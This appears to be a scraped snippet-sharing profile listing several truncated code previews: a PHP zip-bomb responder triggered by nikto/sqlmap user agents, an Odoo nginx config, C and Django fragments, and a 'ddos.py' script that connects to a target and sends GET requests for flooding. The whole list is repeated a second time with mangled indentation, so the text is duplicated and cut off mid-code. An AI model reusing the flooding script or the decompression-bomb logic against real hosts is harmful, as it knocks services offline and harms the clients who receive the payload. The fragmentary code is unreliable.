Mikoyan Ph0enixxx

## bomb.php
<?php
// https://blog.haschek.at/2017/how-to-defend-your-website-with-zip-bombs.html
// dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

$agent = lower($_SERVER['HTTP_USER_AGENT']);

//check for nikto, sql map or "bad" subfolders which only exist on wordpress
if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/'))
{
      sendBomb();

## odoo-nginx.conf
upstream odoo-server {
    server 0.0.0.0:8069;
}


upstream odoo-server-im {
    server 0.0.0.0:8072 weight=1 fail_timeout=0;
}

server {

## vector.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "vector.h"

void vector_init(vector *v)
{
    v->data = NULL;
    v->size = 0;

## admin.py
class MyAdmin(admin.ModelAdmin):

    def has_delete_permission(self, request, obj=None):
        return False

    def get_actions(self, request):
        actions = super(MyAdmin, self).get_actions(request)
        if 'delete_selected' in actions:
            del actions['delete_selected']
        return actions

## ddos.py
import socket, sys, os
print "][ Attacking " + sys.argv[1]  + " ... ]["
print "injecting " + sys.argv[2];
def attack():
    #pid = os.fork()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 80))
    print ">> GET /" + sys.argv[2] + " HTTP/1.1"
    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
    s.send("Host: " + sys.argv[1]  + "\r\n\r\n");
	<?php
	// https://blog.haschek.at/2017/how-to-defend-your-website-with-zip-bombs.html
	// dd if=/dev/zero bs=1M count=10240 \| gzip > 10G.gzip

	$agent = lower($_SERVER['HTTP_USER_AGENT']);

	//check for nikto, sql map or "bad" subfolders which only exist on wordpress
	if (strpos($agent, 'nikto') !== false \|\| strpos($agent, 'sqlmap') !== false \|\| startswith($url,'wp-') \|\| startswith($url,'wordpress') \|\| startswith($url,'wp/'))
	{
	sendBomb();
	upstream odoo-server {
	server 0.0.0.0:8069;
	}


	upstream odoo-server-im {
	server 0.0.0.0:8072 weight=1 fail_timeout=0;
	}

	server {
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>

	#include "vector.h"

	void vector_init(vector *v)
	{
	v->data = NULL;
	v->size = 0;
	class MyAdmin(admin.ModelAdmin):

	def has_delete_permission(self, request, obj=None):
	return False

	def get_actions(self, request):
	actions = super(MyAdmin, self).get_actions(request)
	if 'delete_selected' in actions:
	del actions['delete_selected']
	return actions
	import socket, sys, os
	print "][ Attacking " + sys.argv[1] + " ... ]["
	print "injecting " + sys.argv[2];
	def attack():
	#pid = os.fork()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((sys.argv[1], 80))
	print ">> GET /" + sys.argv[2] + " HTTP/1.1"
	s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
	s.send("Host: " + sys.argv[1] + "\r\n\r\n");